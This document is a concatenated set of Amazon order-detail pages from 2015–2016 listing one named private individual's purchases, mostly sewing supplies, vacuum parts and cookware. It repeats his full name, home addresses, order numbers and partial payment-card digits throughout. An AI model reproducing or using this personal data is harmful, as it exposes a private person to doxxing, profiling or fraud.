Shipping Payment information Payment Method: Item(s) Subtotal: $11.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $11.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$11.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-0542056-9590606 Order Placed: September 14, 2016 Amazon.com order number: 108-0542056-9590606 Order Total: $28.99 Shipped on September 15, 2016 Items Ordered Price 1 of: I-clean 5 Set Replacement Brush Kits For iRobot Roomba 700 Series 760 770 780 790 Bristle Brush and Flexible Beater Brush Sold by: I-clean (seller profile) $28.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $28.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$28.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-9701770-5881043 Order Placed: September 14, 2016 Amazon.com order number: 108-9701770-5881043 Order Total: $115.90 Shipped on September 14, 2016 Items Ordered 1 of: Hyperikon Utility LED Shop Light, 4FT Integrated LED Double-Fixture, 38W (100W Equivalent), 3800 Lumens, 5000K (Crystal White Glow), Frosted Cover, Corded-electric Sold by: Hyperikon (seller profile) | Product question? Ask Seller Price $57.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on September 14, 2016 Items Ordered 1 of: Hyperikon Utility LED Shop Light, 4FT Integrated LED Double-Fixture, 38W (100W Equivalent), 3800 Lumens, 5000K (Crystal White Glow), Frosted Cover, Corded-electric Sold by: Hyperikon (seller profile) | Product question? Ask Seller Price $57.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Print this page for your records. Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $115.90 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $115.90 Estimated tax to be collected: $0.00 ---- WASHINGTON, DC 20010 Grand Total:$115.90 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #116-4295901-7166634 Order Placed: September 12, 2016 Amazon.com order number: 116-4295901-7166634 Order Total: $1,499.00 Shipped on September 13, 2016 Items Ordered Price 1 of: Vapamore MR-1000 Commercial Steam Cleaning System $1,499.00 Sold by: A Better Life Now (seller profile) Condition: New NEW Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $1,499.00 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $1,499.00BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$1,499.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-1656164-2219448 Order Placed: September 7, 2016 Amazon.com order number: 110-1656164-2219448 Order Total: $14.64 Shipped on September 8, 2016 Items Ordered Price 1 of: Things N General, Hendrix Jr., Cary Sold by: Amazon.com Services LLC $14.64 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $14.64 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $14.64 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$14.64 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #002-2919186-4621832 Order Placed: September 6, 2016 Amazon.com order number: 002-2919186-4621832 Order Total: $13.99 Shipped on September 7, 2016 Items Ordered Price 1 of: Foxnovo Cross Stitch Hoop Ring Tambour Bamboo Circle Embroidery -4 Pcs Sold by: Coogifts (seller profile) $13.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $13.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $13.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$13.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-0733883-4858660 Order Placed: August 17, 2016 Amazon.com order number: 108-0733883-4858660 Order Total: $38.46 Shipped on August 17, 2016 Items Ordered Price 1 of: Iautomatic 6 Pack Aero Vac Filters & 3-Armed + 6-Armed Side Brush for iRobot Roomba 500 600 Series 536 550 551 552 564 620 630 650 660 Vacuum Cleaning Robots Sold by: CIMC LLC (seller profile) $16.99 Condition: New 1 of: C2G / Cables To Go 14719 18 AWG Universal Power Cord for NEMA 5-15P to IEC320C13, Black (25 Feet/7.62 Meters) Sold by: Amazon.com Services LLC $9.49 Condition: New 1 of: GearIt 18 AWG Universal Power Cord NEMA 5-15P to IEC320 C13 [UL Listed], Red (2 Feet/0.6 Meters) Sold by: PC Micro Store (seller profile) $5.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $32.47 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Billing address Total before tax: $38.46 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$38.46 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #112-8163923-1855439 Order Placed: August 13, 2016 Amazon.com order number: 112-8163923-1855439 Order Total: $206.31 Shipped on August 13, 2016 Items Ordered 1 of: Seawhisper pack of 70 pcs super wonder clips,alternative to pins for sewing quilting crafts Sold by: Sweet Goods (seller profile) Price $9.99 Condition: New 1 of: Clover Water Soluble Pencil Assortment, 3EA Sold by: Amazon.com Services LLC $5.39 Condition: New 1 of: Gingher 8 Inch Lightweight Bent Trimmers (GS-8) Sold by: National Art Supply (seller profile) | Product question? Ask Seller $21.47 Condition: New 1 of: Gingher 220040-1002 Rounded Pocket Scissors, 6-Inch Sold by: Amazon.com Services LLC $13.73 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on August 13, 2016 Items Ordered 1 of: Gingher 8 Inch Goldhandle Knife Edge Bent Trimmers (01-005292) Sold by: Amazon.com Services LLC Price $28.29 Condition: New 1 of: Slice 10512 Pen Cutter, Auto-Retractable, Stays Sharp up to 10x Longer Than Steel Blades, Dark Grey Sold by: Amazon.com Services LLC $11.53 Condition: New 1 of: Shape-Flex Woven Interfacing-15"X2 Yards $9.30 Print this page for your records. Sold by: CRAFTBOX (seller profile) Condition: New 2 of: Swash 80240514 Pods Unwind Cups (12 Pack), Purple Sold by: Amazon.com Services LLC $6.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on August 13, 2016 Items Ordered 1 of: Butterick Patterns B6255ZZ0 Misses Coat, ZZ (LRG-XLG-XXL) Sold by: Amazon.com Services LLC Price $7.90 Condition: New 1 of: The Sewing Workshop Origami Skirt Sewing Template, Multi-Size Sold by: Amazon.com Services LLC $19.03 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on August 13, 2016 Items Ordered 1 of: Singer Leather Machine Needles Sold by: Amazon.com Services LLC Price $2.39 Condition: New 1 of: Slice 10503 Auto Retractable Box Cutter with Ceramic Blade Sold by: Amazon.com Services LLC $16.42 Condition: New 1 of: COATS & CLARK Dual Duty XP Heavy Thread, 125-Yard, Monaco Blue Sold by: BuyBoxer (seller profile) $5.23 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on August 13, 2016 Items Ordered Price 1 of: Insta Slim Grey Muscle Tank Men's Compression Slimming Under Shirt (Large) $29.95 Sold by: OnlineSports (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on August 13, 2016 Items Ordered Price 1 of: Gingher 01-005102 Lightweight Embroidery Scissors, 4-Inch $11.71 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $206.31 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $206.31 Estimated tax to be collected: $0.00 ---- WASHINGTON, DC 20010 Grand Total:$206.31 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #112-6329462-5030614 Order Placed: August 13, 2016 Amazon.com order number: 112-6329462-5030614 Order Total: $11.95 Shipped on August 14, 2016 Items Ordered Price 1 of: Standard Propane Fuel Cylinder Sold by: Tenka1 (seller profile) $11.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $11.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $11.95 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$11.95 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-4880234-5073003 Order Placed: August 13, 2016 Amazon.com order number: 112-4880234-5073003 Order Total: $1,398.99 Shipped on August 14, 2016 Items Ordered Price 1 of: DYSON 360 EYETM Robot robotic vacuum cleaner RB01NB -Japan (Blue) $1,398.99 Sold by: US 5Star Dept (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $1,398.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $1,398.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$1,398.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-4861130-2257053 Order Placed: August 13, 2016 Amazon.com order number: 112-4861130-2257053 Order Total: $9.99 Shipped on August 13, 2016 Items Ordered Price 1 of: WellieSTR 9PCS Durable Double Twin Needles Pins Sewing Machine Accessories New Size 2.0/90 3.0/90 4.0/90 (3PCS per size/Total 9PCS) Sold by: wellie-store (seller profile) $9.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $9.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $9.99BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.99 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-2768948-1593052 Order Placed: August 13, 2016 Amazon.com order number: 112-2768948-1593052 Order Total: $12.94 Shipped on August 14, 2016 Items Ordered Price 1 of: Schmetz Sewing Machine Twin Denim Needle Sold by: Vacuum & Sewing Center (seller profile) $6.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $6.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.95 Billing address Total before tax: $12.94 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$12.94 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-2656377-0575416 Order Placed: August 13, 2016 Amazon.com order number: 112-2656377-0575416 Order Total: $6.56 Shipped on August 15, 2016 Items Ordered Price 1 of: Jacquard Procion MX Dye .33oz-Brilliant Orange Sold by: Hyatt's All Things Creative (seller profile) $6.56 Condition: New Fast order processing! Tracking numbers provided! Low Expedited Rates! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $6.56 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $6.56 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$6.56 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-6421977-7760238 Order Placed: August 6, 2016 Amazon.com order number: 108-6421977-7760238 Order Total: $58.98 Shipped on August 6, 2016 Items Ordered 1 of: VonShef Induction Hob Heat Diffuser Stainless Steel Available in Two Sizes (9.25") Sold by: DOMU Brands LLC (seller profile) Price $21.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on August 8, 2016 Items Ordered 1 of: Update International (SPS-8) 8 Qt Induction Ready Stainless Steel Stock Pot w/Cover Sold by: Cadima Rani (seller profile) Price $36.99 Condition: New BRAND NEW!! Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Print this page for your records. Payment Method: Debit Card | Last digits: 0079 Item(s) Subtotal: $58.98 Shipping & Handling: $0.00 Billing address BRIAN J COADY ----Total before tax: $58.98 1454 MONROE ST NW Estimated tax to be collected: $0.00 WASHINGTON, DC 20010 ---- United States Grand Total:$58.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #108-1227414-4317012 Order Placed: August 6, 2016 Amazon.com order number: 108-1227414-4317012 Order Total: $13.94 Shipped on August 7, 2016 Items Ordered Price 1 of: Janome Concealed Zipper Foot -767410016 for High Shank Machines Sold by: NGOSEW (seller profile) $9.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $9.00 Debit Card | Last digits: 0079 Shipping & Handling: $4.94 Billing address Total before tax: $13.94 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$13.94 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #104-5735496-1250627 Order Placed: September 16, 2015 Amazon.com order number: 104-5735496-1250627 Seller's order number: 328566 Order Total: $68.95 Shipped on September 17, 2015 Items Ordered Price 1 of: Cinch Men's Blue Plaid On The Bias Button Long Sleeve Shirt White Large Sold by: Sheplers (seller profile) $68.95 Condition: New Shipping Address: Brian Coady 412 WESTCHESTER DR ROCKFORD, IL 61107-4758 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $68.95 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $68.95Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$68.95 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-6567283-7918625 Order Placed: January 4, 2016 Amazon.com order number: 115-6567283-7918625 Order Total: $182.92 Shipped on January 5, 2016 Items Ordered 1 of: Simplicity SideWinder Portable Bobbin Winder Sold by: Amazon.com Services LLC Condition: New 1 of: Aleene's Fabric Tacky Pack Sold by: Amazon.com Services LLC Condition: New 1 of: SINGER Accessory Kit, Including 9 Presser Feet, Twin Needle, and Case Sold by: Amazon.com Services LLC Condition: New 1 of: The Thread Director Spool Pin Adapter TD0001, Lee Fletcher Sold by: Sew Affordable Products (seller profile) Condition: New 1 of: Singer Denim Machine Needles, Size 100/16, 3-Pack Sold by: Amazon.com Services LLC Condition: New 1 of: Dritz Cone Thread Holder Sold by: Amazon.com Services LLC Condition: New 1 of: Olfa 18mm Small Rotary Cutter Sold by: Amazon.com Services LLC Condition: New 1 of: Singer Titanium Universal Reg and Ball Point Machine Needles Combo Pack, 8Pack Sold by: Amazon.com Services LLC Condition: New 1 of: Clover Wonder Clips, Red, 50-Pack Sold by: Amazon.com Services LLC Condition: New 1 of: OLFA Rotary Cutter RTY-2/G Sold by: Amazon.com Services LLC Condition: New 1 of: Vilene Water Soluble Embroidery Stabilizer & Backing -Wash Away -For Free Standing Lace 12"x10yd Roll Sold by: World Weidner -Machine Embroidery Supplies (seller profile) Condition: New Price $23.72 $6.80 $49.37 $19.99 $2.88 $6.78 $8.06 $7.29 $14.22 $10.21 $16.99 Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 5, 2016 Items Ordered Price 1 of: LifeGlow Crafts DIY Polyester Felt Nonwoven Fabric Sheet for Craft Work 42 $11.99 Colors Super Soft Squares15*15cm / 5.9*5.9inch, About 1.5mm Thick, Type A Sold by: Life Glow (seller profile) Condition: New 1 of: Dritz Cone Thread Adapters 2 ct $4.62 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $182.92 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $182.92Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$182.92 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-8815598-7492236 Order Placed: August 6, 2016 Amazon.com order number: 108-8815598-7492236 Order Total: $59.99 Shipped on August 7, 2016 Items Ordered Price 1 of: Secura 8100MC 1800W Portable Induction Cooktop Countertop Burner, Gold Sold by: Lafraise (seller profile) | Product question? Ask Seller $59.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $59.99 Debit Card | Last digits: 0079 Shipping & Handling: $5.99 Free Shipping: -$5.99 Billing address BRIAN J COADY Total before tax: $59.991454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010 United States Grand Total:$59.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #106-1556270-7698639 Order Placed: August 3, 2016 Amazon.com order number: 106-1556270-7698639 Seller's order number: 15620532 Order Total: $10.84 Shipped on August 10, 2016 Items Ordered Price 1 of: Jacquard Procion MX Fiber Reactive Dye emerald green Sold by: BIC Warehouse (seller profile) $6.42 Condition: New Brand New 1 of: COATS & CLARK Dual Duty Plus Jeans Thread, 60-Yard, Red-Orange Sold by: BIC Warehouse (seller profile) $4.42 Condition: New Brand New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $10.84 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $10.84BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$10.84 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-4352257-2911411 Order Placed: July 26, 2016 Amazon.com order number: 112-4352257-2911411 Order Total: $20.94 Shipped on July 27, 2016 Items Ordered Price 1 of: Janome Sewing Machine Universal Needle Size 11 in 5 needles per pack $7.99 Sold by: BIGFLY (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on July 27, 2016 Items Ordered Price 1 of: Take a Quality Ride: The Realities of Implementing a Quality Management $12.95 System, Hinkle, Susan Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $20.94 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $20.94 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$20.94 United States To view the status of your order, return to Order Summary. Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #002-7410066-4938660 Order Placed: June 18, 2016 Amazon.com order number: 002-7410066-4938660 Order Total: $56.57 Shipped on June 21, 2016 Items Ordered Price 1 of: Swash 80240515 Pods Recharge Cups (12 Pack), Green Style: Recharge, Model: $56.57 80240515, Tools & Hardware store Sold by: Real Basics (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $56.57 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $56.57BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$56.57 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-9676558-8900212 Order Placed: January 15, 2016 Amazon.com order number: 115-9676558-8900212 Order Total: $15.12 Shipped on January 18, 2016 Items Ordered Price 1 of: Sample Bag of 100% Wool Craft Felt 1.2mm thick Sold by: TheFeltStore (seller profile) $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $8.99 MasterCard | Last digits: 5262 Shipping & Handling: $6.13 Billing address Total before tax: $15.12 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$15.12 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #115-0250527-4245852 Order Placed: January 15, 2016 Amazon.com order number: 115-0250527-4245852 Order Total: $127.44 Shipped on January 16, 2016 Items Ordered 2 of: Terramar Adult Thermasilk Glove Liner (Black, Small) Sold by: Amazon.com Services LLC Price $10.10 Condition: New 1 of: O2 Rainwear Original Rain Pants, Yellow, Medium Sold by: Amazon.com Services LLC $22.93 Condition: New 1 of: Haggar Men's Stripe Linen Tie, Navy, One Size Sold by: Amazon.com Services LLC $10.77 Condition: New 1 of: Terramar Men's Thermasilk Filament Pant (Natural, Medium) Sold by: Amazon.com Services LLC $20.01 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 15, 2016 Items Ordered 1 of: Singer 7343 Serger Machine Needle Threader Sold by: Amazon.com Services LLC Price $5.64 Condition: New 1 of: New Red Paisley Jacquard Woven Men's Tie Necktie (Purple) Sold by: Geek-M (seller profile) $7.90 Condition: New 100% Brand New,High Quality,USPS Free Shipping,Excellent Customer Service! Shipping Address: Print this page for your records. Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 15, 2016 Items Ordered Price 1 of: Woolly Clothing Co. Men's Merino Wool Long Sleeve V-Neck Medium Grey With $39.99 Black Threading Sold by: Woolly Clothing Co (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $127.44 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $127.44Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$127.44 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-8917887-9353039 Order Placed: January 6, 2016 Amazon.com order number: 112-8917887-9353039 Order Total: $244.94 Shipped on January 8, 2016 Items Ordered Price 1 of: SINGER One Easy-to-Use Computerized Sewing Machine $218.28 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 7, 2016 Items Ordered Price 2 of: Dritz Magnetic Seam Guide $2.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 6, 2016 Items Ordered Price Condition: New 1 of: Dritz Fabric Pattern Weights One (4 pack) of Either Pink, Green or Purple ~ No $12.01 Color Choice ~ Cut Patterns Without Pinning! Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $244.94 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $244.94 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$244.94 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #106-4679657-4554601 Order Placed: August 3, 2016 Amazon.com order number: 106-4679657-4554601 Order Total: $94.39 Shipped on August 4, 2016 Items Ordered 1 of: Schmetz Stretch Twin Sz.2.5/75 Sold by: World Weidner -Machine Embroidery Supplies (seller profile) Price $7.99 Condition: New 1 of: Sew-All Thread 273 Yards-Clove Sold by: Amazon.com Services LLC $8.40 Condition: New 1 of: Janome Red Tip 5 Needle Pack Size 14 Sold by: World Weidner -Machine Embroidery Supplies (seller profile) $7.99 Condition: New 1 of: Terial Arts Terial Magic Fabric Spray -24 oz. Spray Bottle Sold by: Amazon.com Services LLC $13.68 Condition: New 1 of: Deco Art Jacquard Procion Mx Dye, 2/3-Ounce, Teal Sold by: Amazon.com Services LLC $7.97 Condition: New 1 of: Singer Mercerized Cotton Thread 175 Yards-White Size 50 Sold by: Amazon.com Services LLC $5.86 Condition: New 1 of: Gingher 3.5 Inch Stork Embroidery Scissors (01-005280) Sold by: Amazon.com Services LLC $13.85 Condition: New 1 of: Sew-All Thread 273 Yards-Glacier Sold by: Amazon.com Services LLC $6.69 Condition: New 1 of: In-R-Form Unique Sew In Foam Stabilizer-18"X58" White 1/Pkg Model 492-18 Sold by: Amazon.com Services LLC $8.81 Condition: New 1 of: Janome Blue Tip Needles for All Janome Models Sold by: Amazon.com Services LLC $6.47 Condition: New 1 of: Deco Art Jacquard Procion Mx Dye, 2/3-Ounce, Peach Sold by: Amazon.com Services LLC $6.68 Condition: New Shipping Address: Print this page for your records. Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $94.39 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $94.39BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$94.39 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #108-5542053-6273837 Order Placed: June 23, 2016 Amazon.com order number: 108-5542053-6273837 Order Total: $56.02 Shipped on June 23, 2016 Items Ordered 1 of: Sizzix Bigz Die, Heart #3 (Fabi Edition) Sold by: Amazon.com Services LLC Price $14.85 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on June 23, 2016 Items Ordered 1 of: Sizzix Bigz BIGkick/Big Shot Die, Flourish Corners No.2 Sold by: Amazon.com Services LLC Price $19.99 Condition: New 1 of: Sizzix Bigz Die, 5.5 by 6-Inch, Stacked Stars Sold by: Amazon.com Services LLC $13.19 Condition: New 1 of: Dritz Loop Turner -9 1/2" (24.13cm) -#11701 Sold by: nyy (seller profile) $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Print this page for your records. Payment information Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $56.02 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $56.02 Estimated tax to be collected: $0.00 ---- WASHINGTON, DC 20010 Grand Total:$56.02 United States Conditions of Use | 